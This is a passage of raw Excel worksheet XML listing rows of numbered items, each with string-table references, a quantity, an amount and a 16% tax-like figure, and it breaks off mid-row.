    <row r="989" spans="2:11">
      <c r="B989" s="9">
        <v>1017</v>
      </c>
      <c r="C989" s="238" t="s">
        <v>7303</v>
      </c>
      <c r="D989" s="238" t="s">
        <v>7304</v>
      </c>
      <c r="E989" s="238" t="s">
        <v>7305</v>
      </c>
      <c r="F989" s="9"/>
      <c r="G989" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H989" s="10">
        <v>2</v>
      </c>
      <c r="I989" s="14">
        <v>534.76</v>
      </c>
      <c r="J989" s="15">
        <v>85.5616</v>
      </c>
      <c r="K989" s="16"/>
    </row>
    <row r="990" spans="2:11">
      <c r="B990" s="9">
        <v>1018</v>
      </c>
      <c r="C990" s="238" t="s">
        <v>7306</v>
      </c>
      <c r="D990" s="238" t="s">
        <v>6887</v>
      </c>
      <c r="E990" s="238" t="s">
        <v>6973</v>
      </c>
      <c r="F990" s="9"/>
      <c r="G990" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H990" s="10">
        <v>56</v>
      </c>
      <c r="I990" s="14">
        <v>229.6</v>
      </c>
      <c r="J990" s="15">
        <v>36.736</v>
      </c>
      <c r="K990" s="16"/>
    </row>
    <row r="991" spans="2:11">
      <c r="B991" s="9">
        <v>1019</v>
      </c>
      <c r="C991" s="238" t="s">
        <v>7307</v>
      </c>
      <c r="D991" s="238" t="s">
        <v>7308</v>
      </c>
      <c r="E991" s="238" t="s">
        <v>7309</v>
      </c>
      <c r="F991" s="238" t="s">
        <v>7310</v>
      </c>
      <c r="G991" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H991" s="10">
        <v>1</v>
      </c>
      <c r="I991" s="14">
        <v>499.16</v>
      </c>
      <c r="J991" s="15">
        <v>79.8656</v>
      </c>
      <c r="K991" s="16"/>
    </row>
    <row r="992" spans="2:11">
      <c r="B992" s="9">
        <v>1020</v>
      </c>
      <c r="C992" s="238" t="s">
        <v>7311</v>
      </c>
      <c r="D992" s="238" t="s">
        <v>7312</v>
      </c>
      <c r="E992" s="238" t="s">
        <v>7313</v>
      </c>
      <c r="F992" s="9"/>
      <c r="G992" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H992" s="10">
        <v>32</v>
      </c>
      <c r="I992" s="14">
        <v>830.57</v>
      </c>
      <c r="J992" s="15">
        <v>132.9152</v>
      </c>
      <c r="K992" s="16"/>
    </row>
    <row r="993" spans="2:11">
      <c r="B993" s="9">
        <v>1021</v>
      </c>
      <c r="C993" s="238" t="s">
        <v>7314</v>
      </c>
      <c r="D993" s="238" t="s">
        <v>7315</v>
      </c>
      <c r="E993" s="238" t="s">
        <v>7316</v>
      </c>
      <c r="F993" s="238" t="s">
        <v>7317</v>
      </c>
      <c r="G993" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H993" s="10">
        <v>35</v>
      </c>
      <c r="I993" s="14">
        <v>2390.94</v>
      </c>
      <c r="J993" s="15">
        <v>382.536</v>
      </c>
      <c r="K993" s="16"/>
    </row>
    <row r="994" spans="2:11">
      <c r="B994" s="9">
        <v>1022</v>
      </c>
      <c r="C994" s="238" t="s">
        <v>7318</v>
      </c>
      <c r="D994" s="238" t="s">
        <v>7319</v>
      </c>
      <c r="E994" s="238" t="s">
        <v>7320</v>
      </c>
      <c r="F994" s="9"/>
      <c r="G994" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H994" s="10">
        <v>4</v>
      </c>
      <c r="I994" s="14">
        <v>475.68</v>
      </c>
      <c r="J994" s="15">
        <v>76.1088</v>
      </c>
      <c r="K994" s="16"/>
    </row>
    <row r="995" spans="2:11">
      <c r="B995" s="9">
        <v>1023</v>
      </c>
      <c r="C995" s="238" t="s">
        <v>7321</v>
      </c>
      <c r="D995" s="238" t="s">
        <v>7322</v>
      </c>
      <c r="E995" s="238" t="s">
        <v>7323</v>
      </c>
      <c r="F995" s="9"/>
      <c r="G995" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H995" s="10">
        <v>21</v>
      </c>
      <c r="I995" s="14">
        <v>218.73</v>
      </c>
      <c r="J995" s="15">
        <v>35.0112</v>
      </c>
      <c r="K995" s="16"/>
    </row>
    <row r="996" spans="2:11">
      <c r="B996" s="9">
        <v>1024</v>
      </c>
      <c r="C996" s="238" t="s">
        <v>7324</v>
      </c>
      <c r="D996" s="238" t="s">
        <v>7325</v>
      </c>
      <c r="E996" s="238" t="s">
        <v>7326</v>
      </c>
      <c r="F996" s="9"/>
      <c r="G996" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H996" s="10">
        <v>1</v>
      </c>
      <c r="I996" s="14">
        <v>120.02</v>
      </c>
      <c r="J996" s="15">
        <v>19.2032</v>
      </c>
      <c r="K996" s="16"/>
    </row>
    <row r="997" spans="2:11">
      <c r="B997" s="9">
        <v>1025</v>
      </c>
      <c r="C997" s="238" t="s">
        <v>7327</v>
      </c>
      <c r="D997" s="238" t="s">
        <v>7328</v>
      </c>
      <c r="E997" s="238" t="s">
        <v>7329</v>
      </c>
      <c r="F997" s="9"/>
      <c r="G997" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H997" s="10">
        <v>13</v>
      </c>
      <c r="I997" s="14">
        <v>492.65</v>
      </c>
      <c r="J997" s="15">
        <v>78.832</v>
      </c>
      <c r="K997" s="16"/>
    </row>
    <row r="998" spans="2:11">
      <c r="B998" s="9">
        <v>1026</v>
      </c>
      <c r="C998" s="238" t="s">
        <v>7330</v>
      </c>
      <c r="D998" s="238" t="s">
        <v>7331</v>
      </c>
      <c r="E998" s="238" t="s">
        <v>1169</v>
      </c>
      <c r="F998" s="9"/>
      <c r="G998" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H998" s="10">
        <v>8</v>
      </c>
      <c r="I998" s="14">
        <v>2535.51</v>
      </c>
      <c r="J998" s="15">
        <v>405.6832</v>
      </c>
      <c r="K998" s="16"/>
    </row>
    <row r="999" spans="2:11">
      <c r="B999" s="9">
        <v>1027</v>
      </c>
      <c r="C999" s="238" t="s">
        <v>7332</v>
      </c>
      <c r="D999" s="238" t="s">
        <v>7333</v>
      </c>
      <c r="E999" s="238" t="s">
        <v>7334</v>
      </c>
      <c r="F999" s="9"/>
      <c r="G999" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H999" s="10">
        <v>14</v>
      </c>
      <c r="I999" s="14">
        <v>900.59</v>
      </c>
      <c r="J999" s="15">
        <v>144.0992</v>
      </c>
      <c r="K999" s="16"/>
    </row>
    <row r="1000" spans="2:11">
      <c r="B1000" s="9">
        <v>1028</v>
      </c>
      <c r="C1000" s="238" t="s">
        <v>7335</v>
      </c>
      <c r="D1000" s="238" t="s">
        <v>7336</v>
      </c>
      <c r="E1000" s="238" t="s">
        <v>7337</v>
      </c>
      <c r="F1000" s="9"/>
      <c r="G1000" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1000" s="10">
        <v>15</v>
      </c>
      <c r="I1000" s="14">
        <v>413.54</v>
      </c>
      <c r="J1000" s="15">
        <v>66.168</v>
      </c>
      <c r="K1000" s="16"/>
    </row>
    <row r="1001" spans="2:11">
      <c r="B1001" s="9">
        <v>1029</v>
      </c>
      <c r="C1001" s="238" t="s">
        <v>7338</v>
      </c>
      <c r="D1001" s="238" t="s">
        <v>7339</v>
      </c>
      <c r="E1001" s="238" t="s">
        <v>7340</v>
      </c>
      <c r="F1001" s="9"/>
      <c r="G1001" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1001" s="10">
        <v>8</v>
      </c>
      <c r="I1001" s="14">
        <v>191.72</v>
      </c>
      <c r="J1001" s="15">
        <v>30.6816</v>
      </c>
      <c r="K1001" s="16"/>
    </row>
    <row r="1002" spans="2:11">
      <c r="B1002" s="9">
        <v>1030</v>
      </c>
      <c r="C1002" s="238" t="s">
        <v>7341</v>
      </c>
      <c r="D1002" s="238" t="s">
        <v>7342</v>
      </c>
      <c r="E1002" s="238" t="s">
        <v>7343</v>
      </c>
      <c r="F1002" s="9"/>
      <c r="G1002" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1002" s="10">
        <v>2</v>
      </c>
      <c r="I1002" s="14">
        <v>190</v>
      </c>
      <c r="J1002" s="15">
        <v>30.4</v>
      </c>
      <c r="K1002" s="16"/>
    </row>
    <row r="1003" spans="2:11">
      <c r="B1003" s="9">
        <v>1031</v>
      </c>
      <c r="C1003" s="238" t="s">
        <v>7344</v>
      </c>
      <c r="D1003" s="238" t="s">
        <v>6748</v>
      </c>
      <c r="E1003" s="238" t="s">
        <v>6746</v>
      </c>
      <c r="F1003" s="9"/>
      <c r="G1003" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1003" s="10">
        <v>13</v>
      </c>
      <c r="I1003" s="14">
        <v>480.27</v>
      </c>
      <c r="J1003" s="15">
        <v>76.8352</v>
      </c>
      <c r="K1003" s="16"/>
    </row>
    <row r="1004" spans="2:11">
      <c r="B1004" s="9">
        <v>1032</v>
      </c>
      <c r="C1004" s="238" t="s">
        <v>7345</v>
      </c>
      <c r="D1004" s="238" t="s">
        <v>7346</v>
      </c>
      <c r="E1004" s="238" t="s">
        <v>7347</v>
      </c>
      <c r="F1004" s="9"/>
      <c r="G1004" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1004" s="10">
        <v>35</v>
      </c>
      <c r="I1004" s="14">
        <v>1287.55</v>
      </c>
      <c r="J1004" s="15">
        <v>206.024</v>
      </c>
      <c r="K1004" s="16"/>
    </row>
    <row r="1005" spans="2:11">
      <c r="B1005" s="9">
        <v>1033</v>
      </c>
      <c r="C1005" s="238" t="s">
        <v>7348</v>
      </c>
      <c r="D1005" s="238" t="s">
        <v>7349</v>
      </c>
      <c r="E1005" s="238" t="s">
        <v>7350</v>
      </c>
      <c r="F1005" s="9"/>
      <c r="G1005" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1005" s="10">
        <v>1</v>
      </c>
      <c r="I1005" s="14">
        <v>182.04</v>
      </c>
      <c r="J1005" s="15">
        <v>29.1264</v>
      </c>
      <c r="K1005" s="16"/>
    </row>
    <row r="1006" spans="2:11">
      <c r="B1006" s="9">
        <v>1034</v>
      </c>
      <c r="C1006" s="238" t="s">
        <v>7351</v>
      </c>
      <c r="D1006" s="238" t="s">
        <v>5471</v>
      </c>
      <c r="E1006" s="238" t="s">
        <v>5457</v>
      </c>
      <c r="F1006" s="9"/>
      <c r="G1006" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1006" s="10">
        <v>5</v>
      </c>
      <c r="I1006" s="14">
        <v>507.69</v>
      </c>
      <c r="J1006" s="15">
        <v>81.232</v>
      </c>
      <c r="K1006" s="16"/>
    </row>
    <row r="1007" spans="2:11">
      <c r="B1007" s="9">
        <v>1035</v>
      </c>
      <c r="C1007" s="238" t="s">
        <v>7352</v>
      </c>
      <c r="D1007" s="238" t="s">
        <v>7353</v>
      </c>
      <c r="E1007" s="238" t="s">
        <v>7354</v>
      </c>
      <c r="F1007" s="9"/>
      <c r="G1007" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1007" s="10">
        <v>1</v>
      </c>
      <c r="I1007" s="14">
        <v>866.55</v>
      </c>
      <c r="J1007" s="15">
        <v>138.648</v>
      </c>
      <c r="K1007" s="16"/>
    </row>
    <row r="1008" spans="2:11">
      <c r="B1008" s="9">
        <v>1036</v>
      </c>
      <c r="C1008" s="238" t="s">
        <v>7355</v>
      </c>
      <c r="D1008" s="238" t="s">
        <v>6706</v>
      </c>
      <c r="E1008" s="238" t="s">
        <v>6704</v>
      </c>
      <c r="F1008" s="9"/>
      <c r="G1008" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1008" s="10">
        <v>8</v>
      </c>
      <c r="I1008" s="14">
        <v>249.85</v>
      </c>
      <c r="J1008" s="15">
        <v>39.9744</v>
      </c>
      <c r="K1008" s="16"/>
    </row>
    <row r="1009" spans="2:11">
      <c r="B1009" s="9">
        <v>1037</v>
      </c>
      <c r="C1009" s="238" t="s">
        <v>7356</v>
      </c>
      <c r="D1009" s="238" t="s">
        <v>7357</v>
      </c>
      <c r="E1009" s="238" t="s">
        <v>7358</v>
      </c>
      <c r="F1009" s="9"/>
      <c r="G1009" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H1009" s="10">
        <v>6</v>
      </c>
      <c r="I1009" s="14">
        <v>269.03</v>
      </c>
      <c r="J1009" s="15">
        <v>43.0464</v>
      </c>
      <c r="K1009" s="16"/>
    </row>
    <row r="1010" spans="2:11">
      <c r="B1010" s="9">
        <v>1038</v>
      </c>
      <c r="C1010" s="238" t="s">
        <v>7359</v>
      </c>
      <c r="D1010" s="238" t="s">
        <v>7360</v>
      </c>
      <c r="E1010" s="238" t="s">
        <v>7361</v>
      </c>
      <c r="F1010" s="9"/>
      <c r="G1010" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H1010" s="10">
        <v>22</v>
      </c>
      <c r="I1010" s="14">
        <v>1939.48</v>
      </c>
      <c r="J1010" s="15">
        <v>310.3232</v>
      </c>
      <c r="K1010" s="16"/>
    </row>
    <row r="1011" spans="2:11">
      <c r="B1011" s="9">
        <v>1039</v>
      </c>
      <c r="C1011" s="238" t="s">
        <v>7362</v>
      </c>
      <c r="D1011" s="238" t="s">
        <v>7363</v>
      </c>
      <c r="E1011" s="238" t="s">
        <v>7364</v>
      </c>
      <c r="F1011" s="9"/>
      <c r="G1011" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1011" s="10">
        <v>1</v>
      </c>
      <c r="I1011" s="14">
        <v>673.1</v>
      </c>
      <c r="J1011" s="15">
        <v>107.696</v>
      </c>
      <c r="K1011" s="16"/>
    </row>
    <row r="1012" spans="2:11">
      <c r="B1012" s="9">
        <v>1040</v>
      </c>
      <c r="C1012" s="238" t="s">
        <v>7365</v>
      </c>
      <c r="D1012" s="238" t="s">
        <v>6715</v>
      </c>
      <c r="E1012" s="238" t="s">
        <v>7366</v>
      </c>
      <c r="F1012" s="9"/>
      <c r="G1012" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1012" s="10">
        <v>6</v>
      </c>
      <c r="I1012" s="14">
        <v>243.39</v>
      </c>
      <c r="J1012" s="15">
        <v>38.9472</v>
      </c>
      <c r="K1012" s="16"/>
    </row>
    <row r="1013" spans="2:11">
      <c r="B1013" s="9">
        <v>1041</v>
      </c>
      <c r="C1013" s="238" t="s">
        <v>7367</v>
      </c>
      <c r="D1013" s="238" t="s">
        <v>7368</v>
      </c>
      <c r="E1013" s="238" t="s">
        <v>7369</v>
      </c>
      <c r="F1013" s="9"/>
      <c r="G1013" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1013" s="10">
        <v>1</v>
      </c>
      <c r="I1013" s="14">
        <v>10.95</v>
      </c>
      <c r="J1013" s="15">
        <v>1.752</v>
      </c>
      <c r="K1013" s="16"/>
    </row>
    <row r="1014" spans="2:11">
      <c r="B1014" s="9">
        <v>1042</v>
      </c>
      <c r="C1014" s="238" t="s">
        <v>7370</v>
      </c>
      <c r="D1014" s="238" t="s">
        <v>7371</v>
      </c>
      <c r="E1014" s="238" t="s">
        <v>7372</v>
      </c>
      <c r="F1014" s="9"/>
      <c r="G1014" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1014" s="10">
        <v>5</v>
      </c>
      <c r="I1014" s="14">
        <v>3225.21</v>
      </c>
      <c r="J1014" s="15">
        <v>516.032</v>
      </c>
      <c r="K1014" s="16"/>
    </row>
    <row r="1015" spans="2:11">
      <c r="B1015" s="9">
        <v>1043</v>
      </c>
      <c r="C1015" s="238" t="s">
        <v>7373</v>
      </c>
      <c r="D1015" s="238" t="s">
        <v>7374</v>
      </c>
      <c r="E1015" s="238" t="s">
        <v>7375</v>
      </c>
      <c r="F1015" s="9"/>
      <c r="G1015" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1015" s="10">
        <v>1</v>
      </c>
      <c r="I1015" s="14">
        <v>100.84</v>
      </c>
      <c r="J1015" s="15">
        <v>16.1344</v>
      </c>
      <c r="K1015" s="16"/>
    </row>
    <row r="1016" spans="2:11">
      <c r="B1016" s="9">
        <v>1044</v>
      </c>
      <c r="C1016" s="238" t="s">
        <v>7376</v>
      </c>
      <c r="D1016" s="238" t="s">
        <v>7377</v>
      </c>
      <c r="E1016" s="238" t="s">
        <v>7378</v>
      </c>
      <c r="F1016" s="9"/>
      <c r="G1016" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H1016" s="10">
        <v>19</v>
      </c>
      <c r="I1016" s="14">
        <v>774.17</v>
      </c>
      <c r="J1016" s="15">
        <v>123.88</v>
      </c>
      <c r="K1016" s="16"/>
    </row>
    <row r="1017" spans="2:11">
      <c r="B1017" s="9">
        <v>1045</v>
      </c>
      <c r="C1017" s="238" t="s">
        <v>7379</v>
      </c>
      <c r="D1017" s="238" t="s">
        <v>5900</v>
      </c>
      <c r="E1017" s="238" t="s">
        <v>7380</v>
      </c>
      <c r="F1017" s="9"/>
      <c r="G1017" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1017" s="10">
        <v>3</v>
      </c>
      <c r="I1017" s="14">
        <v>4761.85</v>
      </c>
      <c r="J1017" s="15">
        <v>761.8944</v>
      </c>
      <c r="K1017" s="16"/>
    </row>
    <row r="1018" spans="2:11">
      <c r="B1018" s="9">
        <v>1046</v>
      </c>
      <c r="C1018" s="238" t="s">
        <v>7381</v>
      </c>
      <c r="D1018" s="238" t="s">
        <v>7382</v>
      </c>
      <c r="E1018" s="238" t="s">
        <v>6931</v>
      </c>
      <c r="F1018" s="238" t="s">
        <v>6919</v>
      </c>
      <c r="G1018" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1018" s="10">
        <v>2</v>
      </c>
      <c r="I1018" s="14">
        <v>3977.77</v>
      </c>
      <c r="J1018" s="15">
        <v>636.4448</v>
      </c>
      <c r="K1018" s="16"/>
    </row>
    <row r="1019" spans="2:11">
      <c r="B1019" s="9">
        <v>1047</v>
      </c>
      <c r="C1019" s="238" t="s">
        <v>7383</v>
      </c>
      <c r="D1019" s="238" t="s">
        <v>7384</v>
      </c>
      <c r="E1019" s="238" t="s">
        <v>6931</v>
      </c>
      <c r="F1019" s="9"/>
      <c r="G1019" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H1019" s="10">
        <v>1</v>
      </c>
      <c r="I1019" s="14">
        <v>2450</v>
      </c>
      <c r="J1019" s="15">
        <v>392</v>
      </c>
      <c r="K1019" s="16"/>
    </row>
    <row r="1020" spans="2:11">
      <c r="B1020" s="9">
        <v>1048</v>
      </c>
      <c r="C1020" s="238" t="s">
        <v>7385</v>
      </c>
      <c r="D1020" s="238" t="s">
        <v>7386</v>
      </c>
      <c r="E1020" s="238" t="s">
        <v>6931</v>
      </c>
      <c r="F1020" s="238" t="s">
        <v>7387</v>
      </c>
      <c r="G1020" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H1020" s="10">
        <v>1</v>
      </c>
      <c r="I1020" s="14">
        <v>1980</v>
      </c>
      <c r="J1020" s="15">
        <v>316.8</v>
      </c>
      <c r="K1020" s="16"/>
    </row>
    <row r="1021" spans="2:11">
      <c r="B1021" s="9">
        <v>1049</v>
      </c>
      <c r="C1021" s="238" t="s">
        <v>7388</v>
      </c>
      <c r="D1021" s="238" t="s">
        <v>7389</v>
      </c>
      <c r="E1021" s="238" t="s">
        <v>7390</v>
      </c>
      <c r="F1021" s="238" t="s">
        <v>6386</v>
      </c>
      <c r="G1021" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1021" s="10">
        <v>270</v>
      </c>
      <c r="I1021" s="14">
        <v>508.58</v>
      </c>
      <c r="J1021" s="15">
        <v>81.216</v>
      </c>
      <c r="K1021" s="16"/>
    </row>
    <row r="1022" spans="2:11">
      <c r="B1022" s="9">
        <v>1050</v>
      </c>
      <c r="C1022" s="238" t="s">
        <v>7391</v>
      </c>
      <c r="D1022" s="238" t="s">
        <v>7392</v>
      </c>
      <c r="E1022" s="238" t="s">
        <v>7393</v>
      </c>
      <c r="F1022" s="9"/>
      <c r="G1022" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1022" s="10">
        <v>65</v>
      </c>
      <c r="I1022" s="14">
        <v>5042.73</v>
      </c>
      <c r="J1022" s="15">
        <v>806.832</v>
      </c>
      <c r="K1022" s="16"/>
    </row>
    <row r="1023" spans="2:11">
      <c r="B1023" s="9">
        <v>1051</v>
      </c>
      <c r="C1023" s="238" t="s">
        <v>7394</v>
      </c>
      <c r="D1023" s="238" t="s">
        <v>7395</v>
      </c>
      <c r="E1023" s="238" t="s">
        <v>6934</v>
      </c>
      <c r="F1023" s="238" t="s">
        <v>7396</v>
      </c>
      <c r="G1023" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1023" s="10">
        <v>1</v>
      </c>
      <c r="I1023" s="14">
        <v>4641.02</v>
      </c>
      <c r="J1023" s="15">
        <v>742.5632</v>
      </c>
      <c r="K1023" s="16"/>
    </row>
    <row r="1024" spans="2:11">
      <c r="B1024" s="9">
        <v>1052</v>
      </c>
      <c r="C1024" s="238" t="s">
        <v>7397</v>
      </c>
      <c r="D1024" s="238" t="s">
        <v>7398</v>
      </c>
      <c r="E1024" s="238" t="s">
        <v>7399</v>
      </c>
      <c r="F1024" s="238" t="s">
        <v>7400</v>
      </c>
      <c r="G1024" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1024" s="10">
        <v>18</v>
      </c>
      <c r="I1024" s="14">
        <v>914.39</v>
      </c>
      <c r="J1024" s="15">
        <v>146.304</v>
      </c>
      <c r="K1024" s="16"/>
    </row>
    <row r="1025" spans="2:11">
      <c r="B1025" s="9">
        <v>1053</v>
      </c>
      <c r="C1025" s="238" t="s">
        <v>7401</v>
      </c>
      <c r="D1025" s="238" t="s">
        <v>7402</v>
      </c>
      <c r="E1025" s="238" t="s">
        <v>7399</v>
      </c>
      <c r="F1025" s="238" t="s">
        <v>6932</v>
      </c>
      <c r="G1025" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1025" s="10">
        <v>39</v>
      </c>
      <c r="I1025" s="14">
        <v>4748.93</v>
      </c>
      <c r="J1025" s="15">
        <v>759.8448</v>
      </c>
      <c r="K1025" s="16"/>
    </row>
    <row r="1026" spans="2:11">
      <c r="B1026" s="9">
        <v>1054</v>
      </c>
      <c r="C1026" s="238" t="s">
        <v>7403</v>
      </c>
      <c r="D1026" s="238" t="s">
        <v>7404</v>
      </c>
      <c r="E1026" s="238" t="s">
        <v>466</v>
      </c>
      <c r="F1026" s="238" t="s">
        <v>7400</v>
      </c>
      <c r="G1026" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1026" s="10">
        <v>39</v>
      </c>
      <c r="I1026" s="14">
        <v>1593.62</v>
      </c>
      <c r="J1026" s="15">
        <v>254.9664</v>
      </c>
      <c r="K1026" s="16"/>
    </row>
    <row r="1027" spans="2:11">
      <c r="B1027" s="9">
        <v>1055</v>
      </c>
      <c r="C1027" s="238" t="s">
        <v>7405</v>
      </c>
      <c r="D1027" s="238" t="s">
        <v>7406</v>
      </c>
      <c r="E1027" s="238" t="s">
        <v>466</v>
      </c>
      <c r="F1027" s="238" t="s">
        <v>6932</v>
      </c>
      <c r="G1027" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1027" s="10">
        <v>35</v>
      </c>
      <c r="I1027" s="14">
        <v>2586.4</v>
      </c>
      <c r="J1027" s="15">
        <v>413.84</v>
      </c>
      <c r="K1027" s="16"/>
    </row>
    <row r="1028" spans="2:11">
      <c r="B1028" s="9">
        <v>1056</v>
      </c>
      <c r="C1028" s="238" t="s">
        <v>7407</v>
      </c>
      <c r="D1028" s="238" t="s">
        <v>7408</v>
      </c>
      <c r="E1028" s="238" t="s">
        <v>466</v>
      </c>
      <c r="F1028" s="238" t="s">
        <v>5717</v>
      </c>
      <c r="G1028" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1028" s="10">
        <v>9</v>
      </c>
      <c r="I1028" s="14">
        <v>929.19</v>
      </c>
      <c r="J1028" s="15">
        <v>148.6656</v>
      </c>
      <c r="K1028" s="16"/>
    </row>
    <row r="1029" spans="2:11">
      <c r="B1029" s="9">
        <v>1057</v>
      </c>
      <c r="C1029" s="238" t="s">
        <v>7409</v>
      </c>
      <c r="D1029" s="238" t="s">
        <v>7410</v>
      </c>
      <c r="E1029" s="238" t="s">
        <v>7411</v>
      </c>
      <c r="F1029" s="9"/>
      <c r="G1029" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1029" s="10">
        <v>6</v>
      </c>
      <c r="I1029" s="14">
        <v>1461.26</v>
      </c>
      <c r="J1029" s="15">
        <v>233.7984</v>
      </c>
      <c r="K1029" s="16"/>
    </row>
    <row r="1030" spans="2:11">
      <c r="B1030" s="9">
        <v>1058</v>
      </c>
      <c r="C1030" s="238" t="s">
        <v>7412</v>
      </c>
      <c r="D1030" s="238" t="s">
        <v>7413</v>
      </c>
      <c r="E1030" s="238" t="s">
        <v>7414</v>
      </c>
      <c r="F1030" s="9"/>
      <c r="G1030" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1030" s="10">
        <v>3</v>
      </c>
      <c r="I1030" s="14">
        <v>289.55</v>
      </c>
      <c r="J1030" s="15">
        <v>46.3296</v>
      </c>
      <c r="K1030" s="16"/>
    </row>
    <row r="1031" spans="2:11">
      <c r="B1031" s="9">
        <v>1059</v>
      </c>
      <c r="C1031" s="238" t="s">
        <v>7415</v>
      </c>
      <c r="D1031" s="238" t="s">
        <v>6068</v>
      </c>
      <c r="E1031" s="238" t="s">
        <v>5491</v>
      </c>
      <c r="F1031" s="9"/>
      <c r="G1031" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H1031" s="10">
        <v>10</v>
      </c>
      <c r="I1031" s="14">
        <v>579.43</v>
      </c>
      <c r="J1031" s="15">
        <v>92.704</v>
      </c>
      <c r="K1031" s="16"/>
    </row>
    <row r="1032" spans="2:11">
      <c r="B1032" s="9">
        <v>1060</v>
      </c>
      <c r="C1032" s="238" t="s">
        <v>7416</v>
      </c>
      <c r="D1032" s="238" t="s">
        <v>5557</v>
      </c>
      <c r="E1032" s="238" t="s">
        <v>5558</v>
      </c>
      <c r="F1032" s="9"/>
      <c r="G1032" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1032" s="10">
        <v>4</v>
      </c>
      <c r="I1032" s="14">
        <v>112.82</v>
      </c>
      <c r="J1032" s="15">
        <v>18.0544</v>
      </c>
      <c r="K1032" s="16"/>
    </row>
    <row r="1033" spans="2:11">
      <c r="B1033" s="9">
        <v>1061</v>
      </c>
      <c r="C1033" s="238" t="s">
        <v>7417</v>
      </c>
      <c r="D1033" s="238" t="s">
        <v>7418</v>
      </c>
      <c r="E1033" s="238" t="s">
        <v>7419</v>
      </c>
      <c r="F1033" s="9"/>
      <c r="G1033" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1033" s="10">
        <v>44</v>
      </c>
      <c r="I1033" s="14">
        <v>1816.64</v>
      </c>
      <c r="J1033" s="15">
        <v>290.6816</v>
      </c>
      <c r="K1033" s="16"/>
    </row>
    <row r="1034" spans="2:11">
      <c r="B1034" s="9">
        <v>1062</v>
      </c>
      <c r="C1034" s="238" t="s">
        <v>7420</v>
      </c>
      <c r="D1034" s="238" t="s">
        <v>7421</v>
      </c>
      <c r="E1034" s="238" t="s">
        <v>7422</v>
      </c>
      <c r="F1034" s="9"/>
      <c r="G1034" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1034" s="10">
        <v>5</v>
      </c>
      <c r="I1034" s="14">
        <v>1165</v>
      </c>
      <c r="J1034" s="15">
        <v>186.4</v>
      </c>
      <c r="K1034" s="16"/>
    </row>
    <row r="1035" spans="2:11">
      <c r="B1035" s="9">
        <v>1063</v>
      </c>
      <c r="C1035" s="238" t="s">
        <v>7423</v>
      </c>
      <c r="D1035" s="238" t="s">
        <v>7424</v>
      </c>
      <c r="E1035" s="238" t="s">
        <v>7425</v>
      </c>
      <c r="F1035" s="9"/>
      <c r="G1035" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1035" s="10">
        <v>7</v>
      </c>
      <c r="I1035" s="14">
        <v>245.79</v>
      </c>
      <c r="J1035" s="15">
        <v>39.3232</v>
      </c>
      <c r="K1035" s="16"/>
    </row>
    <row r="1036" spans="2:11">
      <c r="B1036" s="9">
        <v>1064</v>
      </c>
      <c r="C1036" s="238" t="s">
        <v>7426</v>
      </c>
      <c r="D1036" s="238" t="s">
        <v>7427</v>
      </c>
      <c r="E1036" s="238" t="s">
        <v>4952</v>
      </c>
      <c r="F1036" s="9"/>
      <c r="G1036" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1036" s="10">
        <v>5</v>
      </c>
      <c r="I1036" s="14">
        <v>488.46</v>
      </c>
      <c r="J1036" s="15">
        <v>78.152</v>
      </c>
      <c r="K1036" s="16"/>
    </row>
    <row r="1037" spans="2:11">
      <c r="B1037" s="9">
        <v>1065</v>
      </c>
      <c r="C1037" s="238" t="s">
        <v>7428</v>
      </c>
      <c r="D1037" s="238" t="s">
        <v>7429</v>
      </c>
      <c r="E1037" s="238" t="s">
        <v>7430</v>
      </c>
      <c r="F1037" s="9"/>
      <c r="G1037" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1037" s="10">
        <v>15</v>
      </c>
      <c r="I1037" s="14">
        <v>559.72</v>
      </c>
      <c r="J1037" s="15">
        <v>89.544</v>
      </c>
      <c r="K1037" s="16"/>
    </row>
    <row r="1038" spans="2:11">
      <c r="B1038" s="9">
        <v>1066</v>
      </c>
      <c r="C1038" s="238" t="s">
        <v>7431</v>
      </c>
      <c r="D1038" s="238" t="s">
        <v>7432</v>
      </c>
      <c r="E1038" s="238" t="s">
        <v>7433</v>
      </c>
